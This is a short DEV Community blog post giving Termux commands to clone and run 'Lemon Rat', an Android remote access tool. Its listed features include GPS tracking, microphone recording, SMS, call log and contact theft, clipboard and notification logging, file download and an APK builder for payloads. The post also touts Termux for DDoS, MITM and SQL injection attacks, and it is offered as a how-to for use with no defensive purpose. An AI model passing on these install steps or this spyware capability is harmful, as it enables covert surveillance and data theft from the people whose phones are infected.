DEV Community

H4Ck3R
H4Ck3R

Posted on • Updated on

How To Install Lemon Rat In Termux 2024

Lemon Rat

TERMUX

Termux is an Android terminal emulator which is based on linux environment.

You can perform many attacks ( ex - openport attack , ddos , mitmf , sql injection , etc )

Termux support both rooted and unrooted devices

You can termux as a root to perform extra attacks which requires root access .

Usage

Open the app , you will see graphical interface

Click on install packages , it will download some basic packages ( make sure you are connected with internet )

Now you can use termux

Before using it ( make sure you are connected with internet )

If u like my work , just tap on this and buy me a coffee
Buy Me A Coffee

what can you do with termux ?

  1. we can perform different attacks

  2. Pentesting

  3. Vulnerability Scanning

  4. Ethical Hacking

We can do most of things using termux

Necessary Post

Lemon : Install
Apkmod : Install

Steps

Update and Upgrade all packages first to avoid unneccesary errors

apt update && apt upgrade -y

Install some important packages

pkg install git

Clone my tool

git clone https://github.com/h4ck3r0/Lemon-termux

Go to tool directory

cd Lemon-termux

Run the tool

bash lemon.sh -i

Now You Have Installed Successfully

Read More

Fix Module Error

cd $PREFIX/share/lemon/ && apt install yarn && yarn add expressjs

.

A cloud based remote android managment suite, powered by NodeJS

Features

GPS Logging
Microphone Recording
View Contacts
SMS Logs
Send SMS
Call Logs
View Installed Apps
View Stub Permissions
Live Clipboard Logging
Live Notification Logging
View WiFi Networks (logs previously seen)
File Explorer & Downloader
Command Queuing
Built In APK Builder

Type lemon to run

Top comments (0)